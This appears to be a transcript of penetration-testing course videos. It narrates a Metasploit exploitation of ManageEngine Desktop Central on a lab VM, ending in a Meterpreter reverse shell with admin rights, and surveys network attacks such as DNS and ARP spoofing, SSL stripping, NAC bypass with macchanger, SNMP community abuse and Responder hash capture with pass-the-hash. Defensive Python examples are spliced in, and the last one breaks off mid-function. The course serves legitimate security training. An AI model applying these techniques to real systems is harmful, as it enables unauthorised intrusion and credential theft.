in order to allow us to train, to practice pen testing. So this is the class where we're actually going to see how it works. First of all, you can see right here our Windows 2008 server running, and it's running because of Metasploitable version 3 with Windows 2008. Now, there are many vulnerabilities available, and we're going to actually see that one of those vulnerabilities is present in this tool here called ManageEngine Desktop Central 9, and I believe that Nessus is going to detect it as Desktop Central 10, but it doesn't make any difference because both of them have the same vulnerability that we're going to see. Well, first of all, you can see that ManageEngine Desktop Central is running on the localhost, port 8020. What is ManageEngine Desktop Central? This is a software that allows you to control an entire Windows environment, so from one single point, from one single location, one single Windows system, you can manage many other Windows systems, whether they are servers or desktops. So you can see here, for example, that you can actually manage Active Directory, you can manage workgroups, you can manage desktops, you can update their system, you can install software, you can enable or disable firewall services; there is a bunch of stuff that you can do using ManageEngine Desktop Central, which is a very helpful tool, and that is why so many companies actually use it, because it's a very, very handy tool.

Now let me go back here to my browser, back to my Nessus scan result. This is the same scan result that I showed in the previous video, where we had about 40 vulnerabilities and 120 informational only. Now, out of those vulnerabilities we already saw that the ones that we have to address first, that we have to look into first, are the critical ones, and Nessus by default will list the vulnerabilities according to their criticality, so the ones that are more critical will come on top and then it will start to lower the status of that vulnerability. As you can see here, when it shows "mixed" at the top, that means that we have critical and probably high vulnerabilities. So let me click there first; we've seen this in the previous video. Nice, so we have critical, critical, medium and info related to the same vulnerability. Obviously we want to take a look at the critical ones, or the critical one, that's why I'm going to click on the first one here, and there is our description: the ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479; it is therefore affected by a remote code execution vulnerability. The solution is to upgrade it to version 10 build 100479. And then we have the output; we have a bunch of information here. We can see that ManageEngine Desktop Central actually runs on various ports: port 8020 as a web server, port 8022 also a web server, and port 8383 also a web server. And here we have some information about the CVSS base score, and some information about the CVE, the Common Vulnerabilities and Exposures entry, which is identified by CVE-2020-10189. We've seen it before; we know how to actually take
a look at it, but what do we do with this information? So I know that the Metasploitable Windows Server 2008 has a bunch of vulnerabilities, and Nessus told me that, but what can I do with it? And this is where we're going to talk about another framework, which is called Metasploit. What is Metasploit? Metasploit is a framework that was designed for a Linux environment, and basically what it does is it knows a bunch of exploits, a bunch of vulnerabilities and exploits to exploit those vulnerabilities. You just have to know, well, first of all, whether Metasploit has the exploit to exploit the vulnerability that you have. Once you figure that out, you have to learn how to actually use that exploit, and in order to use that exploit usually you have to inform some stuff, you have to pass some data, some input, to that exploit, and then you're going to see what happens.

So let's take a look at that. I am going to go to my Kali Linux machine right here, and as you may remember, one of the bright sides of the Kali Linux operating system is that it already comes with a bunch of tools, and that's the case with the Metasploit framework. In order to get access to Metasploit you simply have to run msfconsole. Once you run it you're going to see this brief introduction and welcoming screen; it may take a while to load. So here is an introductory output: we have 2045, at least in this version that I am running right now, as of today, so 2045 exploits, 1106 auxiliary, 344 post; that's the number of payloads that we have, encoders and evasions, or evasion techniques. And it also gave me an introduction up here. Very good.

Now, first, if you want to take a better look at the Metasploit framework console, you can enter the question mark right here, and then you're going to see a bunch of options that you have available; I am scrolling up all the way to here. So you have all these commands; remember, this is a console, so you can actually enter commands: banner, cd, color, and so on. You have a bunch of options, a bunch of commands here, and obviously, since we have too many, we're only going to take a look at the main ones. So first of all, I want to actually see whether I can exploit that vulnerability that was specified right there. Now, since I want to see whether I have support or not, I can use this search command. The search command is used to search for a bunch of information; for example, if I know the CVE, I can use search cve, and I'm going to go back there and take a look at the CVE, which is CVE-2020-10189. I'm going to go there: search cve:2020-109. Now, is that what it is? Let me go back there: 10189, there you go. Desktop Central deserialization. So here it is, and the status is excellent, which means that it is a very accurate, precise and working exploit. Now, I am also going to do another search, because I know for a fact that there is another exploit that we can use in order to leverage this vulnerability. Is there any specific reason
why we're not going to use this exploit here? Well, actually it's very simple: I decided not to use this one because there is a bunch of additional information that I have to pass as input to the exploit, and we can leverage the same vulnerability using another one, and it's going to actually help us take a look at another way of searching. So I can search for an exploit author, and I'm going to search for sinn3r this way; that's because I know that this is the author of one of the exploits that leverage that vulnerability. So when you search by author it's going to show all the exploits that author wrote, and the one that I am actually searching for is an exploit for Windows, for a web server running on Windows, so it's going to be HTTP, not local, and it's in alphabetical order, which means that it's under HTTP, and I know that it starts with, right here, manageengine connectionid. Right, that's exactly what I want.

Now again, comparing those two, why do I prefer this one instead of the other? Because they both do the same thing: they both deploy a reverse TCP connection. What is that type of attack? A reverse TCP connection is an exploit that will leverage a vulnerability that is available in a service, in a software; it will open a backdoor in my own machine, my attacker machine, allowing that target machine to connect to mine. It's a reverse TCP connection because I want to force that target to connect to my machine in a way that whenever I run a command it will actually be executed in that machine. That's why it's called a reverse TCP attack, or reverse TCP connection.

So I can either copy this line here, or I can use this number. In order to define which exploit you want to use, you're going to type use, and as you can see right here there are instructions: you can either say use and then the path to that exploit, or the number of that exploit, which is 214. However, it says "no payload configured, defaulting to windows/meterpreter/reverse_tcp". That's correct, because the payload that I'm going to use is a Meterpreter. There are actually eight different types of payloads, and the most used one, and probably the most powerful, is the Meterpreter. Why is it so powerful? Because what it does is it leverages a vulnerability of a software and it inserts code into that same instance of the software; it does not create an additional process. Why is that so powerful? Because if the person or staff responsible for managing that infrastructure that I'm targeting checks the processes that are running on that machine, they're not going to see an additional process, because the code that I am inserting is being inserted directly into the RAM, into the memory associated with another current software service that is running.

Now, how do I run it? Do I simply say "hey, I want to run it"? Well, there are situations, there are exploits that are single, that you just have to run, and there are other ones that are what is called staged, and that's the case right here. So this is an exploit that uses a staged payload. What does that mean? A staged payload requires a few pieces of information, and it will also require a stager, which is software to be downloaded. So a stager, which is the case of this payload, will download additional code; this additional code will be sent to the target, loaded into the RAM, and then connect to my machine. So that's why the Meterpreter payload is so powerful. Now, as I mentioned, usually there are some options that are required here. How can I see those options? Pretty simple: you can simply run options. So what are the
options that I have here? First of all, RHOSTS, remote hosts: is it required? Yes it is. And RPORT, remote port: yes it is. TARGETURI is also required, but if I don't mention it there is the default option here, which is /. The remote port by default is 8020, which, as we may remember if we go back here, is exactly the port that I am willing to attack; that's the vulnerable port. However, RHOSTS is required and there is no information here, so how do I define the remote host? I use set RHOSTS, that's the variable name, and then the IP address, which is this one. If I go to my Windows machine and I go right here to the command prompt, I am listing my Metasploitable Windows 2008 IP address right there: 192.168.0.22. Very good. I go back here, I define it. Is that all? Well, no, that's not all. Let me run options once again. So now I can see that the target IP address is there, the port is there, the target URI is there, but there are some payload options, payload information that is also required: the local port, LPORT, my attacker machine's port, that's the port that my machine will listen on in that reverse TCP connection, that's the port that my target will connect to in my local machine; and LHOST, my attacker machine's IP address, which is correct.

So what do I do now? I simply run that exploit, and let's see what happens: "creating JSP stager". As I mentioned, this is a stager; a stager needs to download the stage, and it's sending that stage, that code, to the remote machine. "Meterpreter session 1 opened", so there is a connection between these two machines right here at that specific date and time, and that's done. If there was an error it would say "hey, I wasn't able to connect, something happened"; it would show you a debug message.

Now let's see what we can do here. Observe that it's now showing meterpreter here, the Meterpreter console; it's not showing the msf5 console anymore. What if I do getsystem? This is a command that, in a reverse TCP connection, will see if I can become admin, the admin user, and there it is: "in memory admin". I am connected to that machine as an admin user; that's exactly what I wanted. So whatever I do here, whatever tool I use here, I'm running that tool on my target machine as an admin user. Now you may ask: okay, but what can I do, what are the options that I have? You can use help to see all the commands that you have, and you're going to see how powerful it is. So I can, for example, get some information: getsid, for example, that's the server SID; getdesktop, in case it's associated with a domain session. I can actually get some system information, which is sysinfo right here. So that machine is VAGRANT-2008R2, Windows 2008 Server Service Pack 1; it's outdated, yes it is; the architecture; it doesn't belong to a domain, it belongs to a workgroup. And you can copy files, you can run files, you can edit the registry; all possible options are listed here. So you have all those options, you have full control: you can get access to the SAM file, in case it is a system that has a SAM file, copy files, remove, shut down, reboot; you can do a bunch of stuff by using this specific exploit.

Now keep in mind, the goal here is not actually to see whether you can get control of a machine and what you can do once you get control, but actually just to show you that you can use the Metasploit framework to leverage those vulnerabilities by using these exploits. I hope you enjoyed this video. Thank you
very much.

Hello, welcome to module 7, and our topic here is going to be exploiting networks. So we're evolving: in our previous module the focus was on exploiting local vulnerabilities, so we were assuming that you could just run an exploit and that exploit would give you a specific result without having to understand much about the network infrastructure in which that target was inserted. So in regards to the topology, it looked like a local exploitation, although it wasn't a local exploitation; we saw that we can have local or network exploits. But the thing is, the idea was that the way you'd execute it would look like you didn't have to know anything about that network infrastructure or topology, which is different now, because now our focus is on exploiting networks, or network resources such as protocols.

So when exploiting networks there are different ways of doing it. We can attack network protocols, as I mentioned, so we can focus on some protocols for flaws or maybe misconfiguration. One that we saw in a previous module was NetBIOS, which is the protocol, actually the set of protocols, that Microsoft uses to share files, and we're also going to see some other protocols such as SNMP, SMTP, DNS, SSH. Now, we also have the man-in-the-middle attack, which is also referenced as MITM; it stands for man-in-the-middle attack. We're going to see some types of man-in-the-middle attacks, but these are attacks where the attacker, you as a pen tester in this case, is in between a conversation: so there is a source and a destination and you somehow manage to intercept that conversation; you get in the middle of that transmission, and there are different techniques to do this and different goals that may be achieved by doing it. You also have the traditional denial of service attacks, or also the distributed denial of service attack. This is, I would say, the way that it's executed tends to be more simplistic; there is no fancy technique here. Basically what you're trying to achieve is: there is a service running, or a device, and I want to bring it down, I want to shut it down, for example, or make the service unavailable, so it's a denial of service, and usually this is achieved by exploiting a protocol or software flaw. The reason why I said that it doesn't involve too many techniques, or at least not fancy techniques, is because, since you're relying on some flaws, basically you just have to exploit that flaw that is built into the code or the device. You can also attack security features, resources or tools, indeed. So for example, you can try to bypass a firewall, you can try to bypass an intrusion detection system, you can try to bypass a NAC; there are different ways of doing it, and once again the focus here is to either attack, make unavailable, or simply bypass any type of security feature that your target network may have.

Now, going into more detail in regards to the types of exploits that we have to exploit those network vulnerabilities. First of all, one that is much more low level, that's very common, that's actually what people use nowadays: in local area networks, what we see
is the use of switching devices, switches. So it's very common to see switches where you, as a network analyst, for example, can deploy VLANs. Now, many of those switches support tagged or untagged ports; that's the 802.1Q protocol, which allows you to define some additional features for specific ports. So you can say, for example, that if you have a switch composed of 24 ports, I don't know, 12 ports belong to a specific VLAN and the other 12 ports belong to another VLAN. But let's say that out of those 24 ports you have a trunk port that will also support both VLANs: so there is a trunk port, a port that will be used to connect to another switch which also supports 802.1Q, that's going to be a trunk port, so you want to make sure that port talks both VLANs, knows of the existence of both VLANs, also because you want to allow that switch to communicate with the devices that are linked to that other stacked switch. So there is a requirement of capabilities here: you have to make sure that both switches, in case they know different VLANs, also know that there are other VLANs assigned to the computers connected to the other switch. So it's one implementation that can guarantee that different computers will be separated; they will only communicate with the other computers that you actually want them to communicate with. But at the same time you want to guarantee that if computers connected to the other switch belong to VLAN, let's say, A, those computers will be able to communicate with other computers connected to the first switch also belonging to VLAN A, so you need those trunk ports, or uplinks; that's why you need the 802.1Q protocol support.

Now, what is switch spoofing? Switch spoofing is a type of attack where you can fake that your machine actually belongs to that specific VLAN, and even more, you can make your machine work as a switch itself, supporting those VLANs. Actually, it's not that difficult to deploy this type of attack, because, for example, if you have a Linux machine, on a Linux machine you can actually just say "okay, my interface will support this protocol": you can just load that module and then specify, you can create VLAN interfaces, virtual interfaces, and say "this interface here belongs to this VLAN, the other interface belongs to the other VLAN", and you can even tag those interfaces, which means that your machine will behave as a switch.

Another very famous protocol, famous due to its importance and usage and also to its security limitations, security problems, is the Domain Name System protocol, DNS. Two very common types of attacks: DNS spoofing. DNS spoofing is an attack where you fake, you capture a request that is being sent
by a DNS server, and you actually tell that DNS server that a specific name is assigned to a specific IP, but that IP is an IP that you have control of; it can be a server that you, as an attacker, control, and you're faking a website. So let's take a look at an example. Let's say that your client's company has, I don't know, many employees, and one of those employees wants to access google.com. So that person opens the browser and types www.google.com. What's going to happen? It
will request the company's Domain Name System server, the DNS server: hey, can you please resolve this name, google.com? If that DNS server knows the IP address assigned to that name, it will just reply to that client. In case the DNS server doesn't know it, it will perform what is called a recursive name resolution, and that's where the DNS spoofing attack comes in. In this type of attack, when a recursive resolution happens, that DNS server will go to what are called the root DNS servers to initiate
that resolution. If the attacker is capable of faking, saying that it is a root server or a specific server for a specific domain, then it can simply say hey, google.com is assigned to this IP address, which is not the IP address of a Google web server; it's another server sitting somewhere, but it also runs a web server hosting a web page that presents a copy of a Google web page. So at the end the client, the target, will be redirected to that website, which is not the
actual Google website. Obviously this became very difficult to perform due to the improvement in the security of DNS, well, not the DNS protocol itself but the usage of DNS with DNSSEC, and also because of certificates. So performing this type of attack focusing on websites became very, very difficult due to certificates. But you can also focus on another attack, which is tampering with files, changing files. Name resolutions are not always performed based on Domain Name System servers; actually, before a machine asks a DNS server to resolve a name, it will try to locally
perform that resolution based on a local database. Linux and Windows systems rely on the hosts file; obviously it resides in a different location on these two operating systems, but it's the same file with the same content. What does that file have, what does it present? Basically it presents a name and an IP; it associates a name with an IP in a text file. If you're capable of accessing that machine as an administrator, then you can change that file and say hey, google.com is assigned to this IP address here.
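As an added example (not from the course), a small Python check for the hosts-file tampering just described: it parses the file and reports names pinned to addresses the organisation would not expect. The watchlist of names and the sample hosts content are constructed for the demo.

```python
"""
Added example (not from the course): check a hosts file for tampered
name-to-IP entries of the kind described above.

The watchlist and the sample hosts content are constructed for this demo.
"""
import ipaddress

# Where the file lives (well known): Linux /etc/hosts,
# Windows C:\Windows\System32\drivers\etc\hosts. Same text format on both.

# Public names an organisation would not expect to see pinned in a hosts file
# (constructed watchlist).
WATCHLIST = {"google.com", "www.google.com", "gmail.com"}

# Loopback names that are normal in every hosts file and are never reported.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every mapping in a hosts file."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()        # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                                # not a mapping line
        for name in fields[1:]:
            yield ip, name.lower(), line_no


def find_suspicious_entries(text, watchlist=WATCHLIST):
    """Return findings for entries that pin a name to an address.

    Two rules: a watchlisted public name is always reported; any other
    non-loopback name mapped to a non-loopback address is reported for review,
    since end-user machines rarely need such pins.
    """
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if name in LOOPBACK_NAMES:
            continue
        reason = None
        if name in watchlist:
            reason = "watchlisted public name pinned in hosts file"
        elif not ip.is_loopback:
            reason = "non-loopback pin for a non-loopback name (review)"
        if reason:
            findings.append({"line": line_no, "name": name, "ip": str(ip), "reason": reason})
    return findings


# Constructed sample hosts file: normal lines plus one tampered line.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             ip6-localhost ip6-loopback
# the line below is the kind of tampering described in the course
203.0.113.10    www.google.com google.com
10.0.0.5        intranet.example.test
127.0.0.1       dev.local.test
"""

if __name__ == "__main__":
    for f in find_suspicious_entries(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['name']} -> {f['ip']} ({f['reason']})")
```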
You can also do the same thing if you get access to the company's DNS server. If you can control that server, you can just go there and say hey, DNS server, now this name here is assigned to this IP address; don't perform a recursive search, rely on this file that you have here and respond to your clients based on this information that you have right here. Man-in-the-middle attacks: well, first of all, a very common man-in-the-middle attack is ARP spoofing. ARP spoofing relies on the way
that TCP/IP-based networks, which is basically every network, rely on the ARP protocol before actually using IP and any other protocol. So you do have to understand the ARP protocol, but basically what it does is: in order to establish a communication, you have to translate an IP address into a MAC address. Basically what happens is your machine will ask, hey, I want to communicate with this IP address, who has it? The machine that has that IP address will reply to you saying hey, I have it, and
this is my MAC address. In an ARP spoofing attack a man in the middle will intercept that communication and say hey, this is my IP address right here and this is my MAC, but it's not; it's forging, faking that MAC address. Another attack that we will actually deploy in a following video is a replay attack. Replay attacks are once again based on the idea of intercepting traffic, but in a replay attack we're using that packet that's been intercepted to send it again later on, in another opportunity. You may change that information
or not; usually you do. That is actually one of the biggest differences between a replay attack and a relay attack. In a replay attack, many times you want to change the information, at least some of the information that is contained in a packet, but it's also very important to realize that it's supposed to be used at another moment, whereas a relay attack will many times, well, will actually not involve changing the information but simply relaying that packet that's being intercepted. So a situation where you can see a relay attack is
okay, so one example: let's say that you want to open the garage door of a residence, okay, that's not your residence. What you can actually do is fake a request to the device, the device or card that is actually capable of opening that gate. So for example you can come up with a device that will be able to request a remote controller to send the information, the signal, that is required to open that gate. Well, that device doesn't actually want to open the gate, but you do want to
capture that response and, without modifying it, just forward it to the device that is attached to the garage door and then open that garage door. Now this is just an illustration, that is not how garage doors work, it's different, but just to give you a scenario where you can visualize this happening. Okay, it's a situation where, without the device requesting a response, an authentication from the client, you force that client to send that authentication, the credentials, and then you can just forward those credentials to do something. Regarding SSL, you
have SSL stripping; that's where you are actually removing the SSL security. So when it comes to SSL we tend to focus on the HTTP and HTTPS protocols, because that's basically the difference between HTTP and HTTPS: HTTPS is the HTTP protocol along with SSL. Now, the way that you try to implement this type of attack: you may remember that sometimes you enter a URL in your browser and you are not specifying https, okay, so your browser by default uses HTTP. So if you open it and you type
gmail.com, you're actually trying to connect to port 80 using the HTTP protocol, connecting to port 80 of the Gmail web server. Okay, but if the Gmail web server deploys HTTPS, if it's HTTP plus SSL, you as a client will be redirected to port 443, which is the HTTPS port. Okay, nothing unusual, that's how it happens. But when an attacker is deploying the SSL stripping attack, what it's trying to do is monitor traffic, trying to see or analyze all the HTTP requests being sent by clients. Once that HTTP request is sent,
the HTTPS server will respond with a redirection: hey, you are not supposed to connect to port 80, you're supposed to use HTTPS, port 443. What the attacker is going to do when intercepting that communication is say: hey, HTTPS server, or the server that actually hosts that web page, I am the client. So the client had its communication, its packets, intercepted by you, the attacker; you behave as a client, you fake that you're the one that is actually requesting that SSL connection, so the HTTPS server will respond to you and communicate with you
using an encrypted communication, understanding that you're the client. You are forwarding the response sent by that HTTPS server to the actual client, which is the target, but using HTTP, not HTTPS. So what's going on there: you as an attacker are receiving all information coming from that target using the HTTP protocol, without encryption, which means that you can read all the information, and then you just encrypt that using SSL; well, it's not just encryption, but you use SSL to generate the same HTTP information using HTTPS. At this moment it's a
bit different, actually it's a lot different, when you perform the SSL downgrading attack. This relies on the possibility of downgrading the SSL or TLS version. So when the client performs the request, once again you intercept that communication, but what you're going to do is actually respond to that client saying hey, I do not support this SSL or TLS version that you're requesting, can we downgrade to another version? If the client supports that, then the client will say okay, we can use another version, another version which has flaws, and then that communication continues, but
then the communication is being performed using a non-secure, or at least not that secure, layer, which means that the attacker can try to break the information, retrieve the information that is meant to be encrypted. You can also try to bypass network access control solutions. It's very common nowadays to see networks using some type of NAC. Okay, so just a summary: a NAC is a solution, usually not just a single device but an entire solution, that will control the nodes that are trying to access the LAN, the network. So there are different types
of authentication performed by a NAC server. For example, the client would have to have a client software informing credentials, username and password, and only if those credentials are valid will that client get access to the network. That's one example, but there is another example that is also used; as amazing as it is, it's still implemented, it's still common, and it can be easily bypassed, which is a MAC-based NAC. What does that mean? It's a NAC that will verify if that MAC address, the source MAC address, is in the list of
accepted clients; if it is, then the client will get access to the network. Well, there is a very simple tool in a Linux environment, especially in Kali Linux, called macchanger; it's a command, macchanger. You can use macchanger to simply say hey, my MAC is this one. Obviously you have to somehow know a MAC address that is allowed to authenticate in that NAC, which is not hard to do, because if you can capture traffic using a sniffer you can see many MAC addresses flowing and you can
try some of those. Now, it's common to see vulnerabilities coming up every day, and finding vulnerabilities associated with protocols specifically, and that is just another reason why it's important to keep following updates regarding new vulnerabilities. Therefore there are some protocols that are known due to the number of vulnerabilities that are coming up associated with them. So a few more protocols here: Simple Mail Transfer Protocol, or simply SMTP, is the protocol used when transmitting emails, sending emails, and although nowadays most SMTP servers rely on the usage of encryption by
implementing certificates, it's also common to see some servers that still implement plain text SMTP. Now, it's not very common to see flaws associated with the protocol itself, but there are ways of getting hold of very useful information. So for example if you find an SMTP server, you can connect to that server and try to enumerate accounts; you can try to connect and say hey, I want to see if this email account exists, if this user exists, I want to see if this list of accounts exists, and it's actually very simple
to do. Another one that is very resourceful, very powerful, is the Simple Network Management Protocol, SNMP. It's a protocol used to manage networks; by using this protocol you can not only get hold of any kind of information in your entire network, information specific to a specific device, but you can also change many of those pieces of information. So for example you can remotely say hey, that device has that IP address but I want to change it, I'm going to change its IP address to whatever. So it's that powerful, so you can see
how important and critical this protocol is. Now the problem is the versions that are common are versions 1, 2 and 2c, most likely SNMP version 2c. What is the problem with those versions? First of all, its authentication system is based on a username only, which is called community; it's not called username, okay, they use this nomenclature, community. So there is no password, it's just the community name, and if you can figure out what the community name is, there's a bunch of stuff that you can do. Obviously you have different communities and their capabilities, but basically
a community can be read-only or read-write. If you find out a read-only community you'll be able to see, gather, a bunch of information; if you get hold of a read-write community name you'll not only be able to see information but also change information in a network. And then you have SNMP version 3, which is the secure version: it uses credentials, username and password, and also it has an encryption system, so that's the best solution. The problem is it's still very common to see SNMP v2c; actually, only newer devices support SNMPv3.
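As an added example, not from the course, here is Python that classifies a captured SNMP datagram by version and pulls the plaintext community name out of v1/v2c messages, which is the distinction just discussed; the datagrams are constructed inline with a minimal BER encoder, and flagging a SetRequest as read-write exposure is my own rule.

```python
"""
Added example (not from the course): decode the header of an SNMP datagram to
tell whether it is v1/v2c (community name sent in plain text) or v3.
The sample datagrams are constructed here; nothing is sent on the network.
"""

# ---- minimal BER encoder, used only to build the constructed samples ----
def _ber(tag, payload):
    """Tag + definite length + payload (long-form length for >= 128 bytes)."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def _int(v):
    return _ber(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def _octets(b):
    return _ber(0x04, b)


def _seq(*items):
    return _ber(0x30, b"".join(items))


# OID 1.3.6.1.2.1.1.1.0 (sysDescr.0); the first two arcs merge into 0x2b.
SYSDESCR_0 = _ber(0x06, bytes([0x2b, 6, 1, 2, 1, 1, 1, 0]))
NULL = bytes([0x05, 0x00])


def community_message(version, community, pdu_tag, request_id=1):
    """Build an SNMPv1 (version=0) or v2c (version=1) message with one varbind."""
    pdu = _ber(pdu_tag, _int(request_id) + _int(0) + _int(0)
               + _seq(_seq(SYSDESCR_0 + NULL)))
    return _seq(_int(version) + _octets(community) + pdu)


# ---- decoder: reads only what is needed to classify the datagram ----
PDU_NAMES = {0xa0: "GetRequest", 0xa1: "GetNextRequest", 0xa2: "Response",
             0xa3: "SetRequest", 0xa4: "Trap", 0xa5: "GetBulkRequest",
             0xa6: "InformRequest", 0xa7: "SNMPv2-Trap"}


def _read_tlv(buf, pos):
    """Return (tag, value bytes, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long-form length
        n = length & 0x7f
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def inspect_snmp(datagram):
    """Classify an SNMP message: version, plaintext community (if any), PDU type."""
    tag, body, _ = _read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message (outer SEQUENCE missing)")
    vtag, vbytes, pos = _read_tlv(body, 0)
    if vtag != 0x02:
        raise ValueError("version INTEGER missing")
    version = int.from_bytes(vbytes, "big", signed=True)
    if version == 3:
        # v3 carries msgGlobalData and security parameters, no community string.
        return {"version": "v3", "community": None, "pdu": None,
                "finding": "SNMPv3: user-based security, no plaintext community"}
    name = {0: "v1", 1: "v2c"}.get(version, f"unknown({version})")
    ctag, cbytes, pos = _read_tlv(body, pos)
    if ctag != 0x04:
        raise ValueError("community OCTET STRING missing")
    ptag, _, _ = _read_tlv(body, pos)
    pdu = PDU_NAMES.get(ptag, f"pdu(0x{ptag:02x})")
    community = cbytes.decode("latin-1")
    finding = f"SNMP{name}: community '{community}' sent in plain text"
    if pdu == "SetRequest":
        # A SetRequest only succeeds with a read-write community: highest impact.
        finding += " and used for a SetRequest (read-write community exposed)"
    return {"version": name, "community": community, "pdu": pdu, "finding": finding}


# Constructed samples: a v2c read with 'public', a v2c write with 'private',
# and a v3 message (only its version field matters for this demo).
V2C_GET = community_message(1, b"public", 0xa0)
V2C_SET = community_message(1, b"private", 0xa3)
V3_MSG = _seq(_int(3) + _seq(_int(7) + _int(65507) + _octets(b"\x04") + _int(3))
              + _octets(b"") + _seq())

if __name__ == "__main__":
    for dg in (V2C_GET, V2C_SET, V3_MSG):
        print(inspect_snmp(dg)["finding"])
```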
That is one reason why you see so many networks still using SNMP v2c: many of those devices do not support v3. File Transfer Protocol: so FTP is a plain text protocol. We do have SFTP, which is FTP over SSH and which uses encryption, but the File Transfer Protocol itself does not support it, and we are actually going to see how we can leverage a flaw here. We also have the Linux implementation of the SMB protocol, the Server Message Block, created by Microsoft; that's the Samba implementation. Now I'm not going
to talk much about it, because in a following video we will actually discuss NetBIOS and its protocols, which include the SMB protocol. And we also have the secure shell, yes, Secure Shell, SSH, which is a fairly secure remote access protocol, but obviously first of all it depends on the version: if you find a server that is running a very old version of the SSH protocol there will be exploits available for that, but also you can always try to brute force passwords against the SSH server, and we will actually see a tool called
Hydra that will help us do that. So in this first video I wanted to present some network vulnerabilities, how you can exploit network vulnerabilities, what the options are, and we also discussed some protocols that have some known flaws that can be exploited and that you, as a pen tester, should look into whenever you see that those protocols are available in a client's network. I hope you enjoyed this video, thank you very much. Hello, this is our second video of module 7, and the reason why we're going to analyze this protocol,
study this protocol, or at least, well, not specifically a protocol but a suite of protocols, is because it's so important in regards to pen testing. It's so important that the CompTIA PenTest+ exam will actually present to you not just one or two but many questions associated with the problems that analysts will have to face when using Windows systems, and this is a suite of protocols that are embedded in Windows systems. Okay, so that's why we have to take a better look at it. Before we actually understand the flaws, or how to
exploit these flaws, we have to understand the protocol. Okay, so first of all, what is the NetBIOS suite? NetBIOS is a suite that, out of the services that it presents, the most important one is probably the NetBIOS Name Service, or NBNS; basically it's the implementation of this service. So in summary, the NetBIOS protocol was created to allow Windows operating systems to communicate among themselves. It could be just to share files, share printers, or only to see if they are in the network, find other Windows systems in that
same local network. So basically the idea is to use some kind of DNS protocol, but a DNS protocol that is controlled by the Windows systems inside a local network, a Windows local network. Now, leveraging that, we could also share resources such as files and printers, scanners, whatever it is, okay. So there are some main ports associated with the NetBIOS solution, and it will vary depending on the version of the Windows operating system. So for example up to Windows 2008, if it's a server,
and up to Windows 7, if it's a desktop environment, they would use port 135 to perform Microsoft Remote Procedure Calls; newer Windows operating systems don't use this port anymore, but all of them use 137, 138 and 139. So port 137 is the NetBIOS Name Service; that is the port that is used to resolve names. We're going to see in the next slide how Windows systems communicate with other Windows systems in a LAN: it's based on the NetBIOS name, and basically it relies on broadcasting or on a Windows name server,
a local Windows name server, so that is performed using this port 137. Now, to transmit data, that session, that communication, must be controlled by a service. That service can be 138 UDP in case it's datagram based, so transmissions using that are not session controlled, they are not connection oriented; they use UDP on port 138. If it's a session service it uses 139 TCP, not UDP. And also you have SMB using port 445 TCP; that's actually the port that is used to transfer files or share resources. Now, how does the naming service work
in Windows environments based on the NetBIOS suite of protocols? Well, basically a target, so let's say a source, not precisely a target, a source; let's say that you are controlling that source, that device. If you go to the Windows network, you open your Windows Explorer and you want to see the other computers that belong to the same network in which you were inserted, you want to see your Windows neighbors, so you go to My Network and you click there. What you want
to do is see the other Windows systems, okay. Basically what your machine is going to do is say hey, who's here? Okay, if it's a generic question, like I just want to see all the systems that are here, your machine will ask a domain master browser that exists in that network; that master browser will answer you, or send you a list: hey, this is the list of nodes, Windows nodes, that we have here. Okay, nice. However, if you already have that list, so you go to My Network and
you see all those Windows machines there and you want to access a specific machine, so there is machine XYZ and you double-click it; well, that means that you want to actually access resources of that machine, but before you can actually access that machine you have to know that machine's IP address. What you're going to do is broadcast this question: hey, who is XYZ? Then the attacker will say hey, here I am, I am XYZ; it will inform its IP address. So the target will say oh, okay, so I want
to access a few resources that you have, but to do that I have to authenticate, so I want to authenticate. And that's how the NetBIOS protocol works: the machine that is supposed to receive that connection, that request, will send a challenge. So in this case that's the attacker, so the attacker, which is acting as just a regular machine, will say well, okay, to do that you have to answer a challenge. Now here's the catch: the software that you could use in order to perform this type of attack, such as Responder,
what it's going to do is it will always send the same challenge, which means that the target will send an encrypted challenge response; well, not encrypted actually, hashed. So it will send a hashed challenge response, but again it will always be the same response, because the challenge was the same; the challenge that was sent is the same every time. So a software such as Responder will know that the hash that it will receive corresponds to a specific challenge. Now that it has the hash, that software can then use that hash, or you can
use another software, to try to crack that hash. Now, it's not to decrypt; it's a hash, it cannot be decrypted, but we're going to see how it actually occurs. So basically the way it's going to do it is it will compare that hash with a database of hashes that it has, similar to a rainbow table, and once it matches that hash it will know oh, okay, so this hash matches this other hash that I have in my database, and according to my database this hash corresponds to this plain text password, and then the attacker
will know the password, and we are actually going to implement this type of attack. Now that is one way of performing an attack, using a software that will help you capture the hash and then using another one to crack that hash, but there is another type of attack that you can perform, and actually Responder will allow you to do that as well. So what else can you do once you have the hash? You can perform a pass-the-hash attack; it's an attack that will replay that hash and then authenticate to that other machine, getting access to it.
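As an added example (not part of the course), a Python demonstration of why the fixed challenge described above lets a precomputed table of responses recover the password, and why a fresh random challenge defeats that table. The response scheme is a stand-in (HMAC-SHA256 keyed with a password hash), not NTLM, and the wordlist, challenge value and victim password are constructed.

```python
"""
Added example (not from the course): a challenge-response scheme under a
verifier that always sends the same challenge versus one that randomises it.

Stand-in scheme, not NTLM: response = HMAC-SHA256(key=H(password), msg=challenge).
Wordlist, fixed challenge value and passwords are constructed for the demo.
"""
import hashlib
import hmac
import os


def password_key(password):
    """Stand-in for the stored password hash that keys the response (not an NT hash)."""
    return hashlib.sha256(password.encode("utf-8")).digest()


def challenge_response(password, challenge):
    """The client's answer: a keyed hash over the challenge (hashed, not encrypted)."""
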